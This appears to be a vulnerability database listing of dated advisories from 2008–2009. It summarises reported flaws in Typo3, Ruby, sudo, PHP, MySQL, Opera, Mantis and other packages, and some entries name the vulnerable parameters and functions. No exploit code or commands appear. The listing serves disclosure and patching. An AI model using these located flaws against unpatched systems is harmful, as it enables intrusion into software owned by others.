| 2009-02-09 | Secunia reports: Some vulnerabilities have been reported in Typo3, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting and session fixation attacks, and compromise a vulnerable system. The "Install tool" system extension uses insufficiently random entropy sources to generate an encryption key, resulting in weak security. The authentication library does not properly invalidate supplied session tokens, which can be exploited to hijack a user's session. Certain unspecified input passed to the "Indexed Search Engine" system extension is not properly sanitised before being used to invoke commands. This can be exploited to inject and execute arbitrary shell commands. Input passed via the name and content of files to the "Indexed Search Engine" system extension is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Certain unspecified input passed to the Workspace module is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Note: It is also reported that certain unspecified input passed to test scripts of the "ADOdb" system extension is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected website. more... | typo3 |
| 2009-02-09* | The official ruby site reports: Several vulnerabilities in safe level have been discovereds:. untrace_var is permitted at safe level 4; $PROGRAM_NAME may be modified at safe level 4; insecure methods may be called at safe level 1-3; syslog operations are permitted at safe level 4; dl doesn't check taintness, so it could allow attackers to call dangerous functions. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma |
| 2009-02-09* | The official ruby site reports: WEBrick::HTTP::DefaultFileHandler is faulty of exponential time taking requests due to a backtracking regular expression in WEBrick::HTTPUtils.split_header_value. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma |
| 2009-02-09* | The official ruby site reports: resolv.rb allow remote attackers to spoof DNS answers. This risk can be reduced by randomness of DNS transaction IDs and source ports. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma |
| 2009-02-06 | Todd Miller reports: A bug was introduced in Sudo's group matching code in version 1.6.9 when support for matching based on the supplemental group vector was added. This bug may allow certain users listed in the sudoers file to run a command as a different user than their access rule specifies. more... | sudo |
| 2009-02-04 | Drupal Team reports: The Content Translation module for Drupal 6.x enables users to make a translation of an existing item of content (a node). In that proces the existing node's content is copied into the new node's submission form. The module contains a flaw that allows a user with the 'translate content' permission to potentially bypass normal viewing access restrictions, for example allowing the user to see the content of unpublished nodes even if they do not have permission to view unpublished nodes. When user profile pictures are enabled, the default user profile validation function will be bypassed, possibly allowing invalid user names or e-mail addresses to be submitted. more... | drupal5 drupal6 |
| 2009-02-04* | According to CVE-2008-5498 entry: Array index error in the "imageRotate" function in PHP 5.2.8 and earlier allows context-dependent attackers to read the contents of arbitrary memory locations via a crafted value of the third argument (aka the "bgd_color" or "clrBack" argument) for an indexed image. more... | php5-gd |
| 2009-02-03 | Secunia reports: Paul Szabo has reported a vulnerability in Perl File::Path::rmtree, which potentially can be exploited by malicious, local users to gain escalated privileges. The vulnerability is caused due to a race condition in the way File::Path::rmtree handles directory permissions when cleaning up directories. This can be exploited by replacing an existing sub directory in the directory tree with a symbolic link to an arbitrary file. Successful exploitation may allow changing permissions of arbitrary files, if root uses an application using the vulnerable code to delete files in a directory having a world-writable sub directory. more... | perl |
| 2009-01-30 | Secunia reports: Input passed to multiple parameters in action/AttachFile.py is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. Certain input passed to security/antispam.py is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. more... | moinmoin |
| 2009-01-30* | Secunia reports: Spike Spiegel has discovered a vulnerability in Ganglia which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error within the process_path function in gmetad/server.c. This can be exploited to cause a stack-based buffer overflow by e.g. sending a specially crafted message to the gmetad service. The vulnerability is confirmed in version 3.1.1. Other versions may also be affected. more... | ganglia-monitor-core ganglia-monitor-webfrontend |
| 2009-01-28 | The GLPI project reports: Input passed via unspecified parameters is not properly sanitised before being used in SQL queries. This can be exploited to manipulateSQL queries by injecting arbitrary SQL code. more... | glpi |
| 2009-01-25 | Core Security Technologies reports: Multiple cross-site scripting vulnerabilities have been found which may lead to arbitrary remote code execution on the server running the application due to unauthorized upload of Java plugin code. more... | openfire |
| 2009-01-23* | The Apache HTTP Server Project reports: A flaw in mod_imap when using the Referer directive with image maps. In certain site configurations a remote attacker could perform a cross-site scripting attack if a victim can be forced to visit a malicious URL using certain web browsers. more... | apache apache+ipv6 apache+mod_perl apache+mod_ssl apache+mod_ssl+ipv6 apache+mod_ssl+mod_accel apache+mod_ssl+mod_accel+ipv6 apache+mod_ssl+mod_accel+mod_deflate apache+mod_ssl+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_deflate apache+mod_ssl+mod_deflate+ipv6 apache+mod_ssl+mod_snmp apache+mod_ssl+mod_snmp+mod_accel apache+mod_ssl+mod_snmp+mod_accel+ipv6 apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_snmp+mod_deflate apache+mod_ssl+mod_snmp+mod_deflate+ipv6 apache+ssl apache_fp ru-apache ru-apache+mod_ssl |
| 2009-01-23* | A Watchfire whitepaper reports an vulnerability in the Apache webserver. The vulnerability can be exploited by malicious people causing cross site scripting, web cache poisoining, session hijacking and most importantly the ability to bypass web application firewall protection. Exploiting this vulnerability requires multiple carefully crafted HTTP requests, taking advantage of an caching server, proxy server, web application firewall etc. This only affects installations where Apache is used as HTTP proxy in combination with the following web servers: IIS/6.0 and 5.0 Apache 2.0.45 (as web server) apache 1.3.29 WebSphere 5.1 and 5.0 WebLogic 8.1 SP1 Oracle9iAS web server 9.0.2 SunONE web server 6.1 SP4 more... | apache apache+ipv6 apache+mod_perl apache+mod_ssl apache+mod_ssl+ipv6 apache+mod_ssl+mod_accel apache+mod_ssl+mod_accel+ipv6 apache+mod_ssl+mod_accel+mod_deflate apache+mod_ssl+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_deflate apache+mod_ssl+mod_deflate+ipv6 apache+mod_ssl+mod_snmp apache+mod_ssl+mod_snmp+mod_accel apache+mod_ssl+mod_snmp+mod_accel+ipv6 apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_snmp+mod_deflate apache+mod_ssl+mod_snmp+mod_deflate+ipv6 apache+ssl apache_fp ru-apache ru-apache+mod_ssl |
| 2009-01-21 | SecurityFocus reports: IPsec-Tools is affected by multiple remote denial-of-service vulnerabilities because the software fails to properly handle certain network packets. A successful attack allows a remote attacker to crash the software, denying further service to legitimate users. more... | ipsec-tools |
| 2009-01-20 | SecurityFocus reports: TeamSpeak is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. more... | teamspeak_server |
| 2009-01-19 | Secunia reports: A vulnerability has been reported in OptiPNG, which potentially can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in the BMP reader and can be exploited to cause a buffer overflow by tricking a user into processing a specially crafted file. Successful exploitation may allow execution of arbitrary code. more... | optipng |
| 2009-01-19 | Git maintainers report: gitweb has a possible local privilege escalation bug that allows a malicious repository owner to run a command of his choice by specifying diff.external configuration variable in his repository and running a crafted gitweb query. more... | git |
| 2009-01-15 | SecurityFocus reports: GNUs tar and cpio utilities are prone to a denial-of-service vulnerability because of insecure use of the alloca() function. Successfully exploiting this issue allows attackers to crash the affected utilities and possibly to execute code but this has not been confirmed. more... | gtar |
| 2009-01-15 | Secunia reports: The vulnerability is caused due to a boundary error within the "str_read_packet()" function in libavformat/psxstr.c. This can be exploited to cause a heap-based buffer overflow via a specially crafted STR file. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2009-01-15* | securityfocus reports: An attacker with low-level privileges may exploit this issue to bypass authorization and cause arbitrary commands to run within the context of the Nagios server. This may aid in further attacks. more... | nagios nagios2 |
| 2009-01-13 | Secunia reports: A vulnerability has been reported in CGIWrap, which can be exploited by malicious people to conduct cross-site scripting attacks. The vulnerability is caused due to the application generating error messages without specifying a charset. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Successful exploitation may require that the victim uses Internet Explorer or a browser based on Internet Explorer components. more... | cgiwrap |
| 2009-01-11 | Secunia reports: Some security issues have been reported in PDFjam, which can be exploited by malicious, local users to perform certain actions with escalated privileges. The security issues are caused due to the "pdf90", "pdfjoin", and "pdfnup" scripts using temporary files in an insecure manner. This can be exploited to overwrite arbitrary files via symlink attacks. more... | pdfjam |
| 2009-01-11 | securityfocus reports: An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible. Verlihub is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input. Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application. more... | verlihub |
| 2009-01-11 | MySQL reports: The vulnerability is caused due to an error when processing an empty bit-string literal and can be exploited to crash the server via a specially crafted SQL statement. more... | mysql-server |
| 2009-01-11 | MySQL reports: Using RENAME TABLE against a table with explicit DATA DIRECTORY and INDEX DIRECTORY options can be used to overwrite system table information by replacing the symbolic link points. the file to which the symlink points. more... | mysql-server |
| 2009-01-11 | MySQL reports: A malformed password packet in the connection protocol could cause the server to crash. more... | mysql-server |
| 2009-01-11 | MySQL reports: The requirement of the DROP privilege for RENAME TABLE was not enforced. more... | mysql-server |
| 2009-01-11 | SANS reports: The University of Washington IMAP library is a library implementing the IMAP mail protocol. University of Washington IMAP is exposed to a buffer overflow issue that occurs due to a boundary error within the rfc822_output_char function in the c-client library. The University of Washington IMAP library versions prior to 2007e are affected. more... | imap-uw |
| 2009-01-11 | SANS reports: University of Washington "tmail" and "dmail" are mail deliver agents. "tmail" and "dmail" are exposed to local buffer overflow issues because they fail to perform adequate boundary checks on user-supplied data. more... | imap-uw |
| 2009-01-11 | securityfocus reports: The 'libcdaudio' library is prone to a remote heap code in the context of an application that uses the library. Failed attacks will cause denial-of-service conditions. A buffer-overflow in Grip occurs when the software processes a response to a CDDB query that has more than 16 matches. To exploit this issue, an attacker must be able to influence the response to a CDDB query, either by controlling a malicious CDDB server or through some other means. Successful exploits will allow arbitrary code to run. more... | libcdaudio |
| 2009-01-06* | SecurityFocus reports: The xterm program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input. Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application. more... | xterm |
| 2009-01-04 | Secunia reports: Morgan Todd has discovered a vulnerability in AWStats, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed in the URL to awstats.pl is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Successful exploitation requires that the application is running as a CGI script. more... | awstats awstats-devel |
| 2009-01-03 | Jan Lieskovsky reports: perl-File-Path rmtree race condition (CVE-2005-0448 was assigned to address this) This vulnerability was fixed in 5.8.4-7 but re-introduced in 5.8.8-1. It's also present in File::Path 2.xx, up to and including 2.07 which has only a partial fix. more... | p5-File-Path |
| 2009-01-02 | Jan Minar reports: Applying the ``D'' to a file with a crafted file name, or inside a directory with a crafted directory name, can lead to arbitrary code execution. Lack of sanitization throughout Netrw can lead to arbitrary code execution upon opening a directory with a crafted name. The Vim Netrw Plugin shares the FTP user name and password across all FTP sessions. Every time Vim makes a new FTP connection, it sends the user name and password of the previous FTP session to the FTP server. more... | vim vim-gnome vim-gtk2 vim-lite |
| 2008-12-31 | CORE Security Technologies reports: A format string error has been found on the vinagre_utils_show_error() function that can be exploited via commands issued from a malicious server containing format string specifiers on the VNC name. In a web based attack scenario, the user would be required to connect to a malicious server. Successful exploitation would then allow the attacker to execute arbitrary code with the privileges of the Vinagre user. more... | vinagre |
| 2008-12-30 | Marc Schoenefeld and Steve Milner of RedHat SRT and Peter Allor of IBM ISS report: XSS vulnerability with URLPARAM variable SEARCH variable allows arbitrary shell command execution more... | twiki |
| 2008-12-30 | Entry for CVE-2008-5619 says: html2text.php in RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch. more... | roundcube |
| 2008-12-30 | MySQL Team reports: Additional corrections were made for the symlink-related privilege problem originally addressed. The original fix did not correctly handle the data directory pathname if it contained symlinked directories in its path, and the check was made only at table-creation time, not at table-opening time later. more... | mysql-server |
| 2008-12-30 | A trapkit reports: MPlayer contains a stack buffer overflow vulnerability while parsing malformed TwinVQ media files. The vulnerability may be exploited by a (remote) attacker to execute arbitrary code in the context of MPlayer. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2008-12-26 | Secunia reports: A security issue has been reported in Ampache, which can be exploited by malicious, local users to perform certain actions with escalated privileges. The security issue is caused due to the "gather-messages.sh" script handling temporary files in an insecure manner. This can be exploited via symlink attacks to overwrite arbitrary files with the privileges of the user running the script. more... | ampache |
| 2008-12-25* | CUPS reports: The PNG image reading code did not validate the image size properly, leading to a potential buffer overflow (STR #2974) more... | cups-base |
| 2008-12-19 | The Opera Team reports: Manipulating certain text-area contents can cause a buffer overflow, which may be exploited to execute arbitrary code. Certain HTML constructs can cause the resulting DOM to change unexpectedly, which triggers a crash. To inject code, additional techniques will have to be employed. Exceptionally long host names in file: URLs can cause a buffer overflow, which may be exploited to execute arbitrary code. Remote Web pages cannot refer to file: URLs, so successful exploitation involves tricking users into manually opening the exploit URL, or a local file that refers to it. When Opera is previewing a news feed, some scripted URLs are not correctly blocked. These can execute scripts which are able to subscribe the user to any feed URL that the attacker chooses, and can also view the contents of any feeds that the user is subscribed to. These may contain sensitive information. Built-in XSLT templates incorrectly handle escaped content and can cause it to be treated as markup. If a site accepts content from untrusted users, which it then displays using XSLT as escaped strings, this can allow scripted markup to be injected. The scripts will then be executed in the security context of that site. more... | linux-opera opera |
| 2008-12-19 | The MediaWiki development team reports: Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Certain unspecified input related to uploads is not properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when a malicious data is opened. Successful exploitation may require that uploads are enabled and the victim uses an Internet Explorer based browser. Certain SVG scripts are not properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when a malicious data is opened. Successful exploitation may require that SVG uploads are enabled and the victim uses a browser supporting SVG scripting. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain operations when a logged in user visits a malicious site. more... | mediawiki |
| 2008-12-19 | The Drupal Project reports: The update system is vulnerable to Cross site request forgeries. Malicious users may cause the superuser (user 1) to execute old updates that may damage the database. When an input format is deleted, not all existing content on a site is updated to reflect this deletion. Such content is then displayed unfiltered. This may lead to cross site scripting attacks when harmful tags are no longer stripped from 'malicious' content that was posted earlier. more... | drupal5 drupal6 |
| 2008-12-19 | The Mozilla Foundation reports: MFSA 2008-69 XSS vulnerabilities in SessionStore MFSA 2008-68 XSS and JavaScript privilege escalation MFSA 2008-67 Escaped null characters ignored by CSS parser MFSA 2008-66 Errors parsing URLs with leading whitespace and control characters MFSA 2008-65 Cross-domain data theft via script redirect error message MFSA 2008-64 XMLHttpRequest 302 response disclosure MFSA 2008-62 Additional XSS attack vectors in feed preview MFSA 2008-61 Information stealing via loadBindingDocument MFSA 2008-60 Crashes with evidence of memory corruption (rv:1.9.0.5/1.8.1.19) more... | firefox linux-firefox linux-seamonkey linux-thunderbird seamonkey thunderbird |
| 2008-12-11 | The phpMyAdmin Team reports: A logged-in user can be subject of SQL injection through cross site request forgery. Several scripts in phpMyAdmin are vulnerable and the attack can be made through table parameter. more... | phpMyAdmin phpMyAdmin211 |
| 2008-12-08 | PHP Developers reports: Due to a security bug found in the PHP 5.2.7 release, it has been removed from distribution. The bug affects configurations where magic_quotes_gpc is enabled, because it remains off even when set to on. more... | php5 |
| 2008-12-07 | Secunia reports: A vulnerability has been reported in Wireshark, which can be exploited by malicious people to cause a DoS. The vulnerability is caused due to an error in the SMTP dissector and can be exploited to trigger the execution of an infinite loop via a large SMTP packet. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2008-12-07 | Secunia reports: Some vulnerabilities have been reported in PHP, where some have an unknown impact and others can potentially be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. An input validation error exists within the "ZipArchive::extractTo()" function when extracting ZIP archives. This can be exploited to extract files to arbitrary locations outside the specified directory via directory traversal sequences in a specially crafted ZIP archive. An error in the included PCRE library can be exploited to cause a buffer overflow. The problem is that the "BG(page_uid)" and "BG(page_gid)" variables are not initialized. No further information is currently available. The problem is that the "php_value" order is incorrect for Apache configurations. No further information is currently available. An error in the GD library can be exploited to cause a crash via a specially crafted font file. more... | php5 |
| 2008-12-07 | Debian reports: Faxspool in mgetty 1.1.36 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/faxsp.#### temporary file. more... | mgetty+sendfax |
| 2008-12-07 | Secunia reports: The security issue is caused due to an input validation error when processing script names. This can be exploited to read or modify arbitrary files having ".sieve" extensions via directory traversal attacks, with the privileges of the attacker's user id. more... | dovecot-managesieve |
| 2008-12-07 | Secunia reports: Input passed via the "habari_username" parameter when logging in is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | habari |
| 2008-12-07* | Tobias Klein from TrapKit reports: The VLC media player contains an integer overflow vulnerability while parsing malformed RealMedia (.rm) files. The vulnerability leads to a heap overflow that can be exploited by a (remote) attacker to execute arbitrary code in the context of VLC media player. more... | vlc-devel |
| 2008-12-06 | Secunia reports: EgiX has discovered a vulnerability in Mantis, which can be exploited by malicious users to compromise a vulnerable system. Input passed to the "sort" parameter in manage_proj_page.php is not properly sanitised before being used in a "create_function()" call. This can be exploited to execute arbitrary PHP code. more... | mantis |
| 2008-12-06 | Secunia reports: Some vulnerabilities have been reported in Mantis, which can be exploited by malicious users to compromise a vulnerable system and malicious people to conduct cross-site scripting and request forgery attacks. Input passed to the "filter_target" parameter in return_dynamic_filters.php is not properly sanitised before being returned to a user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. A vulnerability is caused due to the application allowing users to perform certain actions via HTTP requests without performing any validity checks to verify the request. This can be exploited to e.g. add a new user with administrative privileges by enticing a logged-in administrator to visit a malicious site. Input passed to the "value" parameter in adm_config_set.php is not properly sanitised before being used in an "eval()" statement. This can be exploited to e.g. execute arbitrary PHP commands via a specially crafted request. Input passed to the "language" parameter in account_prefs_update.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. more... | mantis |
| 2008-12-04 | Squirrelmail team reports: An issue was fixed that allowed an attacker to send specially- crafted hyperlinks in a message that could execute cross-site scripting (XSS) when the user viewed the message in SquirrelMail. more... | squirrelmail |
| 2008-11-29 | The OpenOffice Team reports: A security vulnerability with the way OpenOffice 2.x process WMF files may allow a remote unprivileged user who provides a StarOffice/StarSuite document that is opened by a local user to execute arbitrary commands on the system with the privileges of the user running StarOffice/StarSuite. No working exploit is known right now. A security vulnerability with the way OpenOffice 2.x process EMF files may allow a remote unprivileged user who provides a StarOffice/StarSuite document that is opened by a local user to execute arbitrary commands on the system with the privileges of the user running StarOffice/StarSuite. No working exploit is known right now. more... | openoffice.org-2 openoffice.org-2-devel openoffice.org-2-RC |
| 2008-11-29 | Secunia reports: Input passed via the HTTP "Host" header is not properly sanitised before being used. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site if malicious data is viewed. more... | de-wordpress wordpress wordpress-mu zh-wordpress |
| 2008-11-29 | Samba Team reports: Samba 3.0.29 and beyond contain a change to deal with gcc 4 optimizations. Part of the change modified range checking for client-generated offsets of secondary trans, trans2 and nttrans requests. These requests are used to transfer arbitrary amounts of memory from clients to servers and back using small SMB requests and contain two offsets: One offset (A) pointing into the PDU sent by the client and one (B) to direct the transferred contents into the buffer built on the server side. While the range checking for offset (B) is correct, a cut and paste error lets offset (A) pass completely unchecked against overflow. The buffers passed into trans, trans2 and nttrans undergo higher-level processing like DCE/RPC requests or listing directories. The missing bounds check means that a malicious client can make the server do this higher-level processing on arbitrary memory contents of the smbd process handling the request. It is unknown if that can be abused to pass arbitrary memory contents back to the client, but an important barrier is missing from the affected Samba versions. more... | ja-samba samba samba3 samba32-devel |
| 2008-11-29 | Secunia reports: A security issue has been reported in hplip, which can be exploited by malicious, local users to cause a DoS. The security issue is caused due to an error within hpssd.py when parsing certain requests. This can be exploited to crash the service by sending specially crafted requests to the default port 2207/TCP. more... | hplip |
| 2008-11-24 | Secunia reports: A vulnerability has been discovered in imlib2, which can be exploited by malicious people to potentially compromise an application using the library. The vulnerability is caused due to a pointer arithmetic error within the "load()" function provided by the XPM loader. This can be exploited to cause a heap-based buffer overflow via a specially crafted XPM file. Successful exploitation may allow execution of arbitrary code. more... | imlib2 imlib2-nox11 |
| 2008-11-23 | Secunia reports: A boundary error exists within http_parse_sc_header() in lib/http.c when parsing an overly long HTTP header starting with "Zwitterion v". A boundary error exists within http_get_pls() in lib/http.c when parsing a specially crafted pls playlist containing an overly long entry. A boundary error exists within http_get_m3u() in lib/http.c when parsing a specially crafted m3u playlist containing an overly long "File" entry. more... | streamripper |
| 2008-11-23* | The Mozilla Foundation reports: MFSA 2008-58 Parsing error in E4X default namespace MFSA 2008-57 -moz-binding property bypasses security checks on codebase principals MFSA 2008-56 nsXMLHttpRequest::NotifyEventListeners() same-origin violation MFSA 2008-55 Crash and remote code execution in nsFrameManager MFSA 2008-54 Buffer overflow in http-index-format parser MFSA 2008-53 XSS and JavaScript privilege escalation via session restore MFSA 2008-52 Crashes with evidence of memory corruption (rv:1.9.0.4/1.8.1.18) MFSA 2008-51 file: URIs inherit chrome privileges when opened from chrome MFSA 2008-50 Crash and remote code execution via __proto__ tampering MFSA 2008-49 Arbitrary code execution via Flash Player dynamic module unloading MFSA 2008-48 Image stealing via canvas and HTTP redirect MFSA 2008-47 Information stealing via local shortcut files MFSA 2008-46 Heap overflow when canceling newsgroup message MFSA 2008-44 resource: traversal vulnerabilities MFSA 2008-43 BOM characters stripped from JavaScript before execution MFSA 2008-42 Crashes with evidence of memory corruption (rv:1.9.0.2/1.8.1.17) MFSA 2008-41 Privilege escalation via XPCnativeWrapper pollution MFSA 2008-38 nsXMLDocument::OnChannelRedirect() same-origin violation MFSA 2008-37 UTF-8 URL stack buffer overflow more... | firefox linux-firefox linux-seamonkey linux-thunderbird seamonkey thunderbird |
| 2008-11-22 | The mantis Team reports: When configuring a web application to use only ssl (e. g. by forwarding all http-requests to https), a user would expect that sniffing and hijacking the session is impossible. Though, for this to be secure, one needs to set the session cookie to have the secure flag. Else the cookie will be transferred through http if the victim's browser does a single http-request on the same domain. more... | mantis |
| 2008-11-19 | Timo Sirainen reports in dovecot 1.1.4 release notes: ACL plugin fixes: Negative rights were actually treated as positive rights. 'k' right didn't prevent creating parent/child/child mailbox. ACL groups weren't working. more... | dovecot |
| 2008-11-19 | Secunia reports: Two vulnerabilities have been reported in Libxml2, which can be exploited by malicious people to cause a DoS (Denial of Service) or to potentially compromise an application using the library. 1) An integer overflow error in the "xmlSAX2Characters()" function can be exploited to trigger a memory corruption via a specially Successful exploitation may allow execution of arbitrary code, but requires e.g. that the user is tricked into processing an overly large XML file (2GB or more). 2) An integer overflow error in the "xmlBufferResize()" function can be exploited to trigger the execution of an infinite loop. The vulnerabilities are reported in version 2.7.2. Other versions may also be affected. more... | libxml2 |
| 2008-11-19 | Andreas Kurtz reports: The jabber server Openfire ( more... | openfire |
| 2008-11-18 | Ulf Harnhammar of Secunia Research reports: Stack-based buffer overflow in the read_special_escape function in src/psgen.c in GNU Enscript 1.6.1 and 1.6.4 beta, when the -e (aka special escapes processing) option is enabled, allows user-assisted remote attackers to execute arbitrary code via a crafted ASCII file, related to the setfilename command. more... | enscript-a4 enscript-letter enscript-letterdj |
| 2008-11-16 | SecurityFocus reports: GnuTLS is prone to a security-bypass vulnerability because the application fails to properly validate chained X.509 certificates. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks by impersonating trusted servers. Unsuspecting users may be under a false sense of security that can aid attackers in launching further attacks. more... | gnutls |
| 2008-11-13* | CVE reports: Heap-based buffer overflow in the decodeMP4file function (frontend/main.c) in FAAD2 2.6.1 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted MPEG-4 (MP4) file. more... | faad2 |
| 2008-11-11* | The VLC Team reports: The VLC media player contains a stack overflow vulnerability while parsing malformed cue files. The vulnerability may be exploited by a (remote) attacker to execute arbitrary code in the context of VLC media player. more... | vlc vlc-devel |
| 2008-11-10 | Advisory from Moritz Jodeit, November 8th, 2008: ClamAV contains an off-by-one heap overflow vulnerability in the code responsible for parsing VBA project files. Successful exploitation could allow an attacker to execute arbitrary code with the privileges of the `clamd' process by sending an email with a prepared attachment. A VBA project file embedded inside an OLE2 office document send as an attachment can trigger the off-by-one. Entry from Thu Oct 30 13:52:42 CET 2008 (acab) in ChangeLog: libclamav/vba_extract.c: get_unicode_name off-by-one, bb#1239 reported by Moritz Jodeit >moritz*jodeit.org more... | clamav clamav-devel |
| 2008-11-09 | Trac development team reports: 0.11.2 is a new stable maintenance release. It contains several security fixes and everyone is recommended to upgrade their installations. Bug fixes: Fixes potential DOS vulnerability with certain wiki markup. more... | ja-trac trac |
| 2008-11-07 | Emacs developers report: The Emacs command `run-python' launches an interactive Python interpreter. After the Python process starts up, Emacs automatically sends it the line: import emacs which normally imports a script named emacs.py which is distributed with Emacs. This script, which is typically located in a write-protected installation directory with other Emacs program files, defines various functions to help the Python process communicate with Emacs. The vulnerability arises because Python, by default, prepends '' to the module search path, so modules are looked for in the current directory. If the current directory is world-writable, an attacker may insert malicious code by adding a fake Python module named emacs.py into that directory. more... | emacs |
| 2008-11-03 | Opera reports: When certain parameters are passed to Opera's History Search, they can cause content not to be correctly sanitized. This can allow scripts to be injected into the History Search results page. Such scripts can then run with elevated privileges and interact with Opera's configuration, allowing them to execute arbitrary code. The links panel shows links in all frames on the current page, including links with JavaScript URLs. When a page is held in a frame, the script is incorrectly executed on the outermost page, not the page where the URL was located. This can be used to execute scripts in the context of an unrelated frame, which allows cross-site scripting. more... | linux-opera opera |
| 2008-11-02 | Aurelien Jarno reports: CVE-2008-4539: fix a heap overflow in Cirrus emulation The code in hw/cirrus_vga.c has changed a lot between CVE-2007-1320 has been announced and the patch has been applied. As a consequence it has wrongly applied and QEMU is still vulnerable to this bug if using VNC. more... | qemu qemu-devel |
| 2008-10-31* | SecurityFocus reports: phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. more... | phpMyAdmin phpMyAdmin211 |
| 2008-10-29* | Opera reports: Certain constructs are not escaped correctly by Opera's History Search results. These can be used to inject scripts into the page, which can then be used to look through the user's browsing history, including the contents of the pages they have visited. These may contain sensitive information. If a link that uses a JavaScript URL triggers Opera's Fast Forward feature, when the user activates Fast Forward, the script should run on the current page. When a page is held in a frame, the script is incorrectly executed on the outermost page, not the page where the URL was located. This can be used to execute scripts in the context of an unrelated frame, which allows cross-site scripting. When Opera is previewing a news feed, some scripts are not correctly blocked. These scripts are able to subscribe the user to any feed URL that the attacker chooses, and can also view the contents of any feeds that the user is subscribed to. These may contain sensitive information. more... | linux-opera opera |
| 2008-10-29* | Opera reports: If a malicious page redirects Opera to a specially crafted address (URL), it can cause Opera to crash. Given sufficient address content, the crash could cause execution of code controlled by the attacking page. Once a Java applet has been cached, if a page can predict the cache path for that applet, it can load the applet from the cache, causing it to run in the context of the local machine. This allows it to read other cache files on the computer or perform other normally more restrictive actions. These files could contain sensitive information, which could then be sent to the attacker. more... | linux-opera opera |
| 2008-10-29* | The Opera Team reports: Scripts are able to change the addresses of framed pages that come from the same site. Due to a flaw in the way that Opera checks what frames can be changed, a site can change the address of frames on other sites inside any window that it has opened. This allows sites to open pages from other sites, and display misleading information on them. Custom shortcut and menu commands can be used to activate external applications. In some cases, the parameters passed to these applications are not prepared correctly, and may be created from uninitialized memory. These may be misinterpreted as additional parameters, and depending on the application, this could allow execution of arbitrary code. Successful exploitation requires convincing the user to modify their shortcuts or menu files appropriately, pointing to an appropriate target application, then to activate that shortcut at an appropriate time. To inject code, additional means will have to be employed. When insecure pages load content from secure sites into a frame, they can cause Opera to incorrectly report the insecure site as being secure. The padlock icon will incorrectly be shown, and the security information dialog will state that the connection is secure, but without any certificate information. As a security precaution, Opera does not allow Web pages to link to files on the user's local disk. However, a flaw exists that allows Web pages to link to feed source files on the user's computer. Suitable detection of JavaScript events and appropriate manipulation can unreliably allow a script to detect the difference between successful and unsuccessful subscriptions to these files, to allow it to discover if the file exists or not. In most cases the attempt will fail. It has been reported that when a user subscribes to a news feed using the feed subscription button, the page address can be changed. This causes the address field not to update correctly. Although this can mean that that misleading information can be displayed in the address field, it can only leave the attacking page's address in the address bar, not a trusted third party address. more... | linux-opera opera |
| 2008-10-27 | CVE reports: Heap-based buffer overflow in the SPF_dns_resolv_lookup function in Spf_dns_resolv.c in libspf2 before 1.2.8 allows remote attackers to execute arbitrary code via a long DNS TXT record with a modified length field. more... | libspf2 |
| 2008-10-25 | Secunia reports: OpenX can be exploited by malicious people to conduct SQL injection attacks. Input passed to the "bannerid" parameter in www/delivery/ac.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. more... | openx |
